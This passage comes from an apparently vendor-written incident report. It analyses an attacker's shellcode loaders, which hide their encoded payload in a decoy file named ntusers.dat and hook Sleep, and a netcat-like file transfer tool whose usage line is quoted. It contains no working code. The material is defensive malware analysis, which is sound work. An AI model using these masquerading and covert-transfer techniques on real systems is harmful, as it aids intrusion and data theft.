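Because the rule keys on the application layer rather than the port, it also catches the same trick on other ports; egress filtering that only allows UDP on 53 would have blocked these connections outright.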
An analysis of the custom tools used by the attacker
windpchsvc.exe and winpdasd.exe
Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.
Both files read their payload from a file whose name is chosen to resemble a system file, in order to deceive investigators and users:
Payload file for windpchsvc.exe
The malware, windpchsvc.exe, reads from the file c:\users\Default\ntusers.dat. A legitimate file named ntuser.dat exists in this location; note that the genuine registry hive has no ‘s’ in its name.
A similar file name was used for the winpdasd.exe malware:
Payload file for winpdasd.exe
The malware reads from this file and decodes the bytes for direct execution via a function call, as seen below (call [ebp+payload_alloc] and call esi):
windpchsvc.exe: decode, allocate memory, copy to mem, execute
winpdasd.exe: decode, allocate memory, copy to mem, execute via function call
The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.
Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.
The decompiled function can be seen below:
The “HookSleep” function found in both files, decompiled
When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:
The Sleep function redirected back to the malware code
s.exe
This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:
    s.exe <file> <IP address> <port> <up|down>
This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.
The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:
Decompiled network transfer tool
[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.
Server-side attacks, C&C in public clouds and other MDR cases we observed